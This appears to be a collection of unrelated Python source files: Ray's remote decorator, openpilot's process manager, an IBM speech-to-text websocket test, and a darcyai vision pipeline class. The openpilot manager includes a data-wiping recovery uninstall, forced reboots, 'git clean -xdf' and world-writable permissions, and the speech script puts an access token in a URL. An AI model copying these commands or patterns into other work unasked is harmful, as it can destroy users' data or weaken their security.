memory, object_store_memory, resources,
accelerator_type, max_restarts,
max_task_retries, runtime_env)
raise TypeError("The @ray.remote decorator must be applied to "
"either a function or to a class.")
return decorator
@PublicAPI
def remote(*args, **kwargs):
"""Defines a remote function or an actor class.
This can be used with no arguments to define a remote function or actor as
follows:
.. code-block:: python
@ray.remote
def f():
return 1
@ray.remote
class Foo:
def method(self):
return 1
It can also be used with specific keyword arguments as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Remote task and actor objects returned by @ray.remote can also be
dynamically modified with the same arguments as above using
``.options()`` as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
g = f.options(num_gpus=2, max_calls=None)
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Bar = Foo.options(num_cpus=1, resources=None)
Running remote actors will be terminated when the actor handle to them
in Python is deleted, which will cause them to complete any outstanding
work and then shut down. If you want to kill them immediately, you can
also call ``ray.kill(actor)``.
Args:
num_returns (int): This is only for *remote functions*. It specifies
the number of object refs returned by
the remote function invocation.
num_cpus (float): The quantity of CPU cores to reserve
for this task or for the lifetime of the actor.
num_gpus (int): The quantity of GPUs to reserve
for this task or for the lifetime of the actor.
resources (Dict[str, float]): The quantity of various custom resources
to reserve for this task or for the lifetime of the actor.
This is a dictionary mapping strings (resource names) to floats.
accelerator_type: If specified, requires that the task or actor run
on a node with the specified type of accelerator.
See `ray.accelerators` for accelerator types.
max_calls (int): Only for *remote functions*. This specifies the
maximum number of times that a given worker can execute
the given remote function before it must exit
(this can be used to address memory leaks in third-party
libraries or to reclaim resources that cannot easily be
released, e.g., GPU memory that was acquired by TensorFlow).
By default this is infinite.
max_restarts (int): Only for *actors*. This specifies the maximum
number of times that the actor should be restarted when it dies
unexpectedly. The minimum valid value is 0 (default),
which indicates that the actor doesn't need to be restarted.
A value of -1 indicates that an actor should be restarted
indefinitely.
max_task_retries (int): Only for *actors*. How many times to
retry an actor task if the task fails due to a system error,
e.g., the actor has died. If set to -1, the system will
retry the failed task until the task succeeds, or the actor
has reached its max_restarts limit. If set to `n > 0`, the
system will retry the failed task up to n times, after which the
task will throw a `RayActorError` exception upon :obj:`ray.get`.
Note that Python exceptions are not considered system errors
and will not trigger retries.
max_retries (int): Only for *remote functions*. This specifies
the maximum number of times that the remote function
should be rerun when the worker process executing it
crashes unexpectedly. The minimum valid value is 0,
the default is 4 (default), and a value of -1 indicates
infinite retries.
runtime_env (Dict[str, Any]): Specifies the runtime environment for
this actor or task and its children. See
:ref:`runtime-environments` for detailed documentation.
override_environment_variables (Dict[str, str]): (Deprecated in Ray
1.4.0, will be removed in Ray 1.6--please use the ``env_vars``
field of :ref:`runtime-environments` instead.) This specifies
environment variables to override for the actor or task. The
overrides are propagated to all child actors and tasks. This
is a dictionary mapping variable names to their values. Existing
variables can be overridden, new ones can be created, and an
existing variable can be unset by setting it to an empty string.
Note: can only be set via `.options()`.
"""
worker = global_worker
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
# This is the case where the decorator is just @ray.remote.
return make_decorator(worker=worker)(args[0])
# Parse the keyword arguments from the decorator.
valid_kwargs = [
"num_returns", "num_cpus", "num_gpus", "memory", "object_store_memory",
"resources", "accelerator_type", "max_calls", "max_restarts",
"max_task_retries", "max_retries", "runtime_env"
]
error_string = ("The @ray.remote decorator must be applied either "
"with no arguments and no parentheses, for example "
"'@ray.remote', or it must be applied using some of "
f"the arguments in the list {valid_kwargs}, for example "
"'@ray.remote(num_returns=2, "
"resources={\"CustomResource\": 1})'.")
assert len(args) == 0 and len(kwargs) > 0, error_string
for key in kwargs:
assert key in valid_kwargs, error_string
num_cpus = kwargs["num_cpus"] if "num_cpus" in kwargs else None
num_gpus = kwargs["num_gpus"] if "num_gpus" in kwargs else None
resources = kwargs.get("resources")
if not isinstance(resources, dict) and resources is not None:
raise TypeError("The 'resources' keyword argument must be a "
f"dictionary, but received type {type(resources)}.")
if resources is not None:
assert "CPU" not in resources, "Use the 'num_cpus' argument."
assert "GPU" not in resources, "Use the 'num_gpus' argument."
accelerator_type = kwargs.get("accelerator_type")
# Handle other arguments.
num_returns = kwargs.get("num_returns")
max_calls = kwargs.get("max_calls")
max_restarts = kwargs.get("max_restarts")
max_task_retries = kwargs.get("max_task_retries")
memory = kwargs.get("memory")
object_store_memory = kwargs.get("object_store_memory")
max_retries = kwargs.get("max_retries")
runtime_env = kwargs.get("runtime_env")
return make_decorator(
num_returns=num_returns,
num_cpus=num_cpus,
num_gpus=num_gpus,
memory=memory,
object_store_memory=object_store_memory,
resources=resources,
accelerator_type=accelerator_type,
max_calls=max_calls,
max_restarts=max_restarts,
max_task_retries=max_task_retries,
max_retries=max_retries,
runtime_env=runtime_env,
worker=worker)
|
manager.py | #!/usr/bin/env python2.7
import os
import sys
import fcntl
import errno
import signal
import subprocess
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat)
except (OSError, IOError):
pass
os._exit(os.wait()[1])
if __name__ == "__main__":
neos_update_required = os.path.isfile("/init.qcom.rc") \
and (not os.path.isfile("/VERSION") or int(open("/VERSION").read()) < 8)
if neos_update_required:
# update continue.sh before updating NEOS
if os.path.isfile(os.path.join(BASEDIR, "scripts", "continue.sh")):
from shutil import copyfile
copyfile(os.path.join(BASEDIR, "scripts", "continue.sh"), "/data/data/com.termux/files/continue.sh")
# run the updater
print("Starting NEOS updater")
subprocess.check_call(["git", "clean", "-xdf"], cwd=BASEDIR)
os.system(os.path.join(BASEDIR, "installer", "updater", "updater"))
raise Exception("NEOS outdated")
elif os.path.isdir("/data/neoupdate"):
from shutil import rmtree
rmtree("/data/neoupdate")
unblock_stdout()
import glob
import shutil
import hashlib
import importlib
import subprocess
import traceback
from multiprocessing import Process
import zmq
from setproctitle import setproctitle #pylint: disable=no-name-in-module
from common.params import Params
import cereal
ThermalStatus = cereal.log.ThermalData.ThermalStatus
from selfdrive.services import service_list
from selfdrive.swaglog import cloudlog
import selfdrive.messaging as messaging
from selfdrive.registration import register
from selfdrive.version import version, dirty
import selfdrive.crash as crash
from selfdrive.loggerd.config import ROOT
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald",
"uploader": "selfdrive.loggerd.uploader",
"controlsd": "selfdrive.controls.controlsd",
"radard": "selfdrive.controls.radard",
"ubloxd": "selfdrive.locationd.ubloxd",
"mapd": "selfdrive.mapd.mapd",
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./start.sh"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"visiond": ("selfdrive/visiond", ["./visiond"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"orbd": ("selfdrive/orbd", ["./orbd_wrapper.sh"]),
"updated": "selfdrive.updated",
}
android_packages = ("ai.comma.plus.offroad", "ai.comma.plus.frame")
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing visiond sometimes causes page table corruption
unkillable_processes = ['visiond']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
persistent_processes = [
'thermald',
'logmessaged',
'logcatd',
'tombstoned',
'uploader',
'ui',
'gpsd',
'updated',
]
car_started_processes = [
'controlsd',
'loggerd',
'sensord',
'radard',
'calibrationd',
'visiond',
'proclogd',
'ubloxd',
'orbd',
'mapd',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def launcher(proc, gctx):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# exec the process
mod.main(gctx)
except KeyboardInterrupt:
cloudlog.warning("child %s got SIGINT" % proc)
except Exception:
# can't install the crash handler becuase sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc, gctx))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
else:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
else:
running[name].terminate()
# give it 5 seconds to die
running[name].join(5.0)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
running[name].join(15.0)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def pm_apply_packages(cmd):
for p in android_packages:
system("pm %s %s" % (cmd, p))
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
global gctx
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# set gctx
gctx = {}
def system(cmd):
try:
cloudlog.info("running %s" % cmd)
subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
cloudlog.event("running failed",
cmd=e.cmd,
output=e.output[-1024:],
returncode=e.returncode)
def manager_thread():
# now loop
context = zmq.Context()
thermal_sock = messaging.sub_sock(context, service_list['thermal'].port)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
for p in persistent_processes:
start_managed_process(p)
# start frame
pm_apply_packages('enable')
system("am start -n ai.comma.plus.frame/.MainActivity")
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
params = Params()
logger_dead = False
while 1:
# get health of board, log this in "thermal"
msg = messaging.recv_sock(thermal_sock, wait=True)
# uploader is gated based on the phone temperature
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
kill_managed_process("uploader")
else:
start_managed_process("uploader")
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in car_started_processes:
kill_managed_process(p)
# check the status of all processes, did any of them die?
for p in running:
cloudlog.debug(" running %s %s" % (p, running[p]))
# is this still needed?
if params.get("DoUninstall") == "1":
break
def get_installed_apks():
dat = subprocess.check_output(["pm", "list", "packages", "-f"]).strip().split("\n")
ret = {}
for x in dat:
if x.startswith("package:"):
v,k = x.split("package:")[1].split("=")
ret[k] = v
return ret
def install_apk(path):
# can only install from world readable path
install_path = "/sdcard/%s" % os.path.basename(path)
shutil.copyfile(path, install_path)
ret = subprocess.call(["pm", "install", "-r", install_path])
os.remove(install_path)
return ret == 0
def update_apks():
# install apks
installed = get_installed_apks()
install_apks = glob.glob(os.path.join(BASEDIR, "apk/*.apk"))
for apk in install_apks:
app = os.path.basename(apk)[:-4]
if app not in installed:
installed[app] = None
cloudlog.info("installed apks %s" % (str(installed), ))
for app in installed.iterkeys():
apk_path = os.path.join(BASEDIR, "apk/"+app+".apk")
if not os.path.exists(apk_path):
continue
h1 = hashlib.sha1(open(apk_path).read()).hexdigest()
h2 = None
if installed[app] is not None:
h2 = hashlib.sha1(open(installed[app]).read()).hexdigest()
cloudlog.info("comparing version of %s %s vs %s" % (app, h1, h2))
if h2 is None or h1 != h2:
cloudlog.info("installing %s" % app)
success = install_apk(apk_path)
if not success:
cloudlog.info("needing to uninstall %s" % app)
system("pm uninstall %s" % app)
success = install_apk(apk_path)
assert success
def manager_update():
if os.path.exists(os.path.join(BASEDIR, "vpn")):
cloudlog.info("installing vpn")
os.system(os.path.join(BASEDIR, "vpn", "install.sh"))
update_apks()
def manager_prepare():
# build cereal first
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, "cereal"))
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
for p in managed_processes:
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
os.system("service call power 16 i32 0 s16 recovery i32 1")
def main():
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
if os.getenv("NOLOG") is not None:
del managed_processes['loggerd']
del managed_processes['tombstoned']
if os.getenv("NOUPLOAD") is not None:
del managed_processes['uploader']
if os.getenv("NOVISION") is not None:
del managed_processes['visiond']
if os.getenv("LEAN") is not None:
del managed_processes['uploader']
del managed_processes['loggerd']
del managed_processes['logmessaged']
del managed_processes['logcatd']
del managed_processes['tombstoned']
del managed_processes['proclogd']
if os.getenv("NOCONTROL") is not None:
del managed_processes['controlsd']
del managed_processes['radard']
# support additional internal only extensions
try:
import selfdrive.manager_extensions
selfdrive.manager_extensions.register(register_managed_process)
except ImportError:
pass
params = Params()
params.manager_start()
# set unset params
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("IsFcwEnabled") is None:
params.put("IsFcwEnabled", "1")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("IsUploadVideoOverCellularEnabled") is None:
params.put("IsUploadVideoOverCellularEnabled", "1")
if params.get("IsDriverMonitoringEnabled") is None:
params.put("IsDriverMonitoringEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# put something on screen while we set things up
if os.getenv("PREPAREONLY") is not None:
spinner_proc = None
else:
spinner_text = "chffrplus" if params.get("Passive")=="1" else "openpilot"
spinner_proc = subprocess.Popen(["./spinner", "loading %s"%spinner_text],
cwd=os.path.join(BASEDIR, "selfdrive", "ui", "spinner"),
close_fds=True)
try:
manager_update()
manager_init()
manager_prepare()
finally:
if spinner_proc:
spinner_proc.terminate()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall") == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
websocket_test.py | """
https://cloud.ibm.com/docs/speech-to-text?topic=speech-to-text-websockets#websockets
Speech samples
https://raw.githubusercontent.com/Azure-Samples/cognitive-services-speech-sdk/f9807b1079f3a85f07cbb6d762c6b5449d536027/samples/cpp/windows/console/samples/whatstheweatherlike.wav
https://www.signalogic.com/index.pl?page=speech_codec_wav_samples
http://www.voiptroubleshooter.com/open_speech/american/OSR_us_000_0010_8k.wav - american
http://www.voiptroubleshooter.com/open_speech/american/OSR_us_000_0030_8k.wav - american
http://www.voiptroubleshooter.com/open_speech/british/OSR_uk_000_0020_8k.wav - british
http://www.voiptroubleshooter.com/open_speech/french/OSR_fr_000_0041_8k.wav - french
"""
import json
import requests
import websocket
import threading
from threading import Thread
import os
from base64 import b64encode
from ibm_watson import IAMTokenManager
env_var = 'STT_API_KEY'
if env_var in os.environ:
STT_API_KEY = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'STT_API_URL'
if env_var in os.environ:
STT_API_URL = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'STT_WS_URL'
if env_var in os.environ:
STT_WS_URL = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'STT_HOST'
if env_var in os.environ:
STT_HOST = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
env_var = 'STT_PORT'
if env_var in os.environ:
STT_PORT = os.environ[env_var]
else:
raise Exception("Error no %s Defined!" % env_var)
def get_audio_content():
# f = open('static/audio/tts-lisa-intro.ogg', 'rb')
# audio_content = f.read()
# f.close()
result = requests.get('https://raw.githubusercontent.com/Azure-Samples/cognitive-services-speech-sdk/f9807b1079f3a85f07cbb6d762c6b5449d536027/samples/cpp/windows/console/samples/whatstheweatherlike.wav')
if result.status_code != 200:
raise Exception('Error retrieving audo: %s' % result.status_code)
return result.content
audio_content = get_audio_content()
iam_token_manager = IAMTokenManager(apikey=STT_API_KEY)
stt_access_token = iam_token_manager.get_token()
auth = b64encode(b"apikey:" + STT_API_KEY.encode('ascii')).decode("ascii")
headers = {'Authorization': 'Basic %s' % auth}
broadband_model = 'en-US_BroadbandModel'
telephony_model = 'en-US_Telephony'
narrowband_model = 'en-US_NarrowbandModel'
recognize_url = "%s/v1/recognize?access_token=%s&model=%s" % (STT_WS_URL, stt_access_token, telephony_model)
speech_url = 'https://www.signalogic.com/melp/EngSamples/Orig/male.wav'
output = []
def on_message(ws, message):
print("### message ###")
print(message)
json_message = json.loads(message)
results = json_message.get('audio_metrics', None)
if results is not None:
output.insert(0, json_message)
results = json_message.get('results', None)
if results is not None:
output.append(json_message)
result = results[0]
final = result.get('final')
if final:
completed.set()
def on_error(ws, error):
print("### error ###")
print(error)
def on_close(ws):
print("### closed ###")
def on_open(ws):
print("### opened ###")
msg = {"action": "start",
"audio_metrics": True,
"interim_results": True,
"processing_metrics": True}
ws.send(json.dumps(msg).encode('utf8'))
started.set()
def ws_thread(ws):
ws.run_forever()
started = threading.Event()
completed = threading.Event()
websocket.enableTrace(True)
ws = websocket.WebSocketApp(recognize_url, on_open=on_open, on_message=on_message, on_error=on_error, on_close=on_close)
th = Thread(target=ws_thread, args=(ws,))
th.start()
started.wait(None)
ws.send(audio_content, opcode=websocket.ABNF.OPCODE_BINARY)
msg = {"action": "stop"}
ws.send(json.dumps(msg).encode('utf8'))
# Wait for 'final' to be set to true in results
completed.wait(None)
ws.close()
print('### output ###')
print(json.dumps(output, indent=4))
|
pipeline.py | import json
import os
import pathlib
import threading
import time
from collections import OrderedDict
from collections.abc import Iterable
from flask import Flask, request, Response, jsonify, render_template
from multiprocessing.pool import ThreadPool
from signal import SIGABRT, SIGILL, SIGINT, SIGSEGV, SIGTERM, SIGQUIT, signal
from typing import Callable, Any, Dict, Tuple, Union, List
from unittest.mock import sentinel
from darcyai.config import Config
from darcyai.config_registry import ConfigRegistry
from darcyai.cyclic_toposort import acyclic_toposort
from darcyai.input.input_multi_stream import InputMultiStream
from darcyai.input.input_stream import InputStream
from darcyai.log import setup_custom_logger
from darcyai.output.output_stream import OutputStream
from darcyai.perceptor.perceptor import Perceptor
from darcyai.perceptor.perceptor_node import PerceptorNode
from darcyai.perception_object_model import PerceptionObjectModel
from darcyai.processing_engine import ProcessingEngine
from darcyai.stream_data import StreamData
from darcyai.utils import validate_not_none, validate_type, validate
class Pipeline():
"""
The Pipeline class is the main class of the darcyai package.
# Arguments
input_stream (InputStream): The input stream to be used by the pipeline.
input_data_history_len (int): The number of input data items to be
stored in the history. Defaults to `1`.
pom_history_len (int): The number of POM items to be stored in the
history. Defaults to `1`.
metrics_history_len (int): The number of metrics items to be stored in
the history. Defaults to `1`.
num_of_edge_tpus (int): The number of Edge TPUs. Defaults to `1`.
perceptor_error_handler_callback (Callable[[str, Exception], None]): The
callback function to be called when a Perceptor throws
an exception. Defaults to `None`.
output_stream_error_handler_callback (Callable[[str, Exception], None]): The
callback function to be called when an OutputStream
throws an exception. Defaults to `None`.
input_stream_error_handler_callback (Callable[[Exception], None]): The
callback function to be called when an InputStream throws
an exception. Defaults to `None`.
perception_completion_callback (Callable[[PerceptionObjectModel], None]): The
callback function to be called when all the perceptors have completed
processing. Defaults to `None`.
universal_rest_api (bool): Whether or not to use the universal
REST API. Defaults to `False`.
rest_api_base_path (str): The base path of the REST API. Defaults to `/`.
rest_api_flask_app (Flask): The Flask application to be used by
the REST API. Defaults to `None`.
rest_api_port (int): The port of the REST API. Defaults to `5000`.
rest_api_host (str): The host of the REST API. Defaults to `localhost`.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera,
... input_data_history_len=10,
... pom_history_len=10,
... metrics_history_len=10,
... num_of_edge_tpus=1,
... perceptor_error_handler_callback=None,
... output_stream_error_handler_callback=None,
... input_stream_error_handler_callback=None,
... perception_completion_callback=None,
... pulse_completion_callback=None,
... universal_rest_api=True,
... rest_api_base_path="/",
... rest_api_flask_app=None,
... rest_api_port=5000,
... rest_api_host="localhost")
```
"""
def __init__(self,
input_stream: InputStream,
input_data_history_len: int = 50,
pom_history_len: int = 50,
metrics_history_len: int = 50,
num_of_edge_tpus: int = 1,
perceptor_error_handler_callback: Callable[[str, Exception], None] = None,
output_stream_error_handler_callback: Callable[[str, Exception], None] = None,
input_stream_error_handler_callback: Callable[[Exception], None] = None,
perception_completion_callback: Callable[[PerceptionObjectModel], None] = None,
pulse_completion_callback: Callable[[PerceptionObjectModel], None] = None,
universal_rest_api: bool = False,
rest_api_base_path: str = None,
rest_api_flask_app: Flask = None,
rest_api_port: int = None,
rest_api_host: str = None):
validate_not_none(input_stream, "input_stream is required")
validate_type(input_stream, (InputStream, InputMultiStream),
"input_stream must be an instance of InputStream")
validate_type(
num_of_edge_tpus,
int,
"num_of_edge_tpus must be an integer")
validate(
num_of_edge_tpus > 0,
"num_of_edge_tpus must be greater then 0")
if perceptor_error_handler_callback is not None:
validate(callable(perceptor_error_handler_callback),
"perceptor_error_handler_callback must be a function")
if output_stream_error_handler_callback is not None:
validate(callable(output_stream_error_handler_callback),
"output_stream_error_handler_callback must be a function")
if input_stream_error_handler_callback is not None:
validate(callable(input_stream_error_handler_callback),
"input_stream_error_handler_callback must be a function")
self.__set_perception_completion_callback(perception_completion_callback)
if pulse_completion_callback is not None:
validate(callable(pulse_completion_callback),
"pulse_completion_callback must be a function")
self.__pulse_completion_callback = pulse_completion_callback
if universal_rest_api:
if rest_api_flask_app is not None:
validate_type(
rest_api_flask_app,
Flask,
"rest_api_flask_app must be of type Flask")
else:
validate_not_none(rest_api_port, "rest_api_port is required")
validate_type(
rest_api_port,
int,
"rest_api_port must be of type int")
validate(
0 <= rest_api_port <= 65535,
"rest_api_port must be between 0 and 65535")
validate_not_none(rest_api_host, "rest_api_host is required")
validate_type(
rest_api_host,
str,
"rest_api_host must be a string")
validate_not_none(
rest_api_base_path,
"rest_api_base_path is required")
validate_type(
rest_api_base_path,
str,
"rest_api_base_path must be a string")
self.__flask_app = rest_api_flask_app
self.__port = rest_api_port
self.__host = rest_api_host
self.__path = rest_api_base_path
self.__input_stream = input_stream
self.__num_of_edge_tpus = num_of_edge_tpus
self.__input_data_history_len = input_data_history_len
self.__input_data_history = OrderedDict()
self.__pom_history_len = pom_history_len
self.__pom_history = OrderedDict()
self.__metrics_history = OrderedDict()
self.__metrics_history_len = metrics_history_len
self.__average_pipeline_cycle_execution = 0
self.__average_perceptor_execution = {}
self.__perceptors_execution_time = {}
self.__perceptor_error_handler_callback = perceptor_error_handler_callback
self.__output_stream_error_handler_callback = output_stream_error_handler_callback
self.__input_stream_error_handler_callback = input_stream_error_handler_callback
self.__perceptors = {}
self.__output_streams = {}
self.__processing_engine = ProcessingEngine(self.__num_of_edge_tpus)
self.__thread_pool = ThreadPool(10)
self.__pom = PerceptionObjectModel()
self.__pulse_number = 0
self.__perceptor_config_registry = {}
self.__perceptor_config_schema = {}
self.__output_config_registry = {}
self.__output_config_schema = {}
self.__logger = setup_custom_logger(__name__)
self.__running = False
if universal_rest_api:
threading.Thread(target=self.__start_api_server).start()
signals = [SIGABRT, SIGILL, SIGINT, SIGSEGV, SIGTERM, SIGQUIT]
for sig in signals:
signal(sig, self.stop)
def num_of_edge_tpus(self) -> int:
"""
Gets the number of Edge TPUs in the pipeline.
# Returns
int: The number of Edge TPUs in the pipeline.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> pipeline.num_of_edge_tpus()
```
"""
return self.__num_of_edge_tpus
def add_perceptor(self,
name: str,
perceptor: Perceptor,
input_callback: Callable[[StreamData,
PerceptionObjectModel,
ConfigRegistry],
Any] = None,
output_callback: Callable[[Any,
PerceptionObjectModel,
ConfigRegistry],
Any] = None,
parent: str = None,
multi: bool = False,
accelerator_idx: Union[int, None] = None,
default_config: Dict[str, Any] = None) -> None:
"""
Adds a new Perceptor to the pipeline.
# Arguments
name (str): The name of the Perceptor (must be a valid variable name).
perceptor (Perceptor): The Perceptor to be added.
input_callback (Callable[[StreamData, PerceptionObjectModel, ConfigRegistry], Any]): The
callback function to be called when the Perceptor receives input data.
Defaults to `None`.
output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The
callback function to be called when the Perceptor produces output data.
Defaults to `None`.
parent (str): The name of the parent Perceptor. Defaults to `None`.
multi (bool): Whether or not to run the perceptor for each item in input data.
Defaults to `False`.
accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.
Defaults to `None`.
default_config (Dict[str, Any]): The default configuration for the Perceptor.
Defaults to `None`.
# Examples
```python
>>> from darcyai.input.camera_stream import CameraStream
>>> from darcyai.pipeline import Pipeline
>>> camera = CameraStream(video_device="/dev/video0")
>>> pipeline = Pipeline(input_stream=camera)
>>> pipeline.add_perceptor(name="perceptor",
... perceptor=MyPerceptor(),
... input_callback=None,
... output_callback=None,
... parent="input_stream",
... multi=True,
... accelerator_idx=0,
... default_config={"key": "value"})
```
"""
self.__logger.debug("Adding Perceptor '%s' to Pipeline", name)
self.__validate_perceptor(
name=name,
perceptor=perceptor,
input_callback=input_callback,
output_callback=output_callback,
accelerator_idx=accelerator_idx,
default_config=default_config)
if parent is not None and parent not in self.__perceptors:
raise ValueError(
f"perceptor with name '{parent}' does not exist")
perceptor_node = PerceptorNode(
name,
perceptor,
input_callback,
output_callback,
multi,
accelerator_idx)
self.__perceptors[name] = perceptor_node
if parent is not None:
self.__perceptors[parent].add_child_perceptor(name)
self.__create_config_registry_for_perceptor(
name, perceptor, default_config)
def add_perceptor_before(self,
name_to_insert_before: str,
name: str,
perceptor: Perceptor,
input_callback: Callable[[StreamData,
PerceptionObjectModel,
ConfigRegistry],
Any] = None,
output_callback: Callable[[Any,
PerceptionObjectModel,
ConfigRegistry],
Any] = None,
multi: bool = False,
accelerator_idx: Union[int, None] = None,
default_config: dict = None) -> None:
"""
Adds a new Perceptor to the pipeline.
# Arguments
